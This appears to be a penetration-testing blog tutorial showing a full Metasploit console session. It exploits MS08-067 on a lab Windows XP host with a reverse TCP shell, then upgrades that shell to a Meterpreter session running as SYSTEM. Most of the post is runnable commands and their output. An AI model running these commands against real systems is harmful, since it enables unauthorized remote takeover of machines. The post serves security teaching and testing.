Metasploit Meterpreter Command Shell Upgrade

Seeing is believing 🙂

root@bt:~# msfconsole

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 707 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13065 updated today (2011.06.29)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.96.1
lhost => 192.168.96.1
msf exploit(ms08_067_netapi) > set rhost 192.168.96.129
rhost => 192.168.96.129
msf exploit(ms08_067_netapi) > set lport 443
lport => 443
msf exploit(ms08_067_netapi) > exploit -z

[*] Started reverse handler on 192.168.96.1:443
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094

Good, command shell is on the background now, what if we want to change that existing command shell session into meterpreter session? re-exploit? Oops, you should forget about to re-exploit, Metasploit has a feature to upgrade the command shell session to meterpreter session, look at the -u option. Let’s try that.

msf exploit(ms08_067_netapi) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

-K Terminate all sessions
-c Run a command on the session given with -i, or all
-d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
-k Terminate session
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-u Upgrade a win32 shell to a meterpreter session
-v List verbose fields

msf exploit(ms08_067_netapi) > sessions -u 1

[*] Started reverse handler on 192.168.96.1:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700

Well, new meterpreter session is now on the session list 😉

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094
2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ XP_FDCC 192.168.96.1:443 -> 192.168.96.129:1095

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

nice feature, good job Metasploit team 😉

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Spentera

We are specializing in penetration test, vulnerability assessment, computer forensics, as well as intrusion analyst and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use Contact Our Team menu on the sidebar.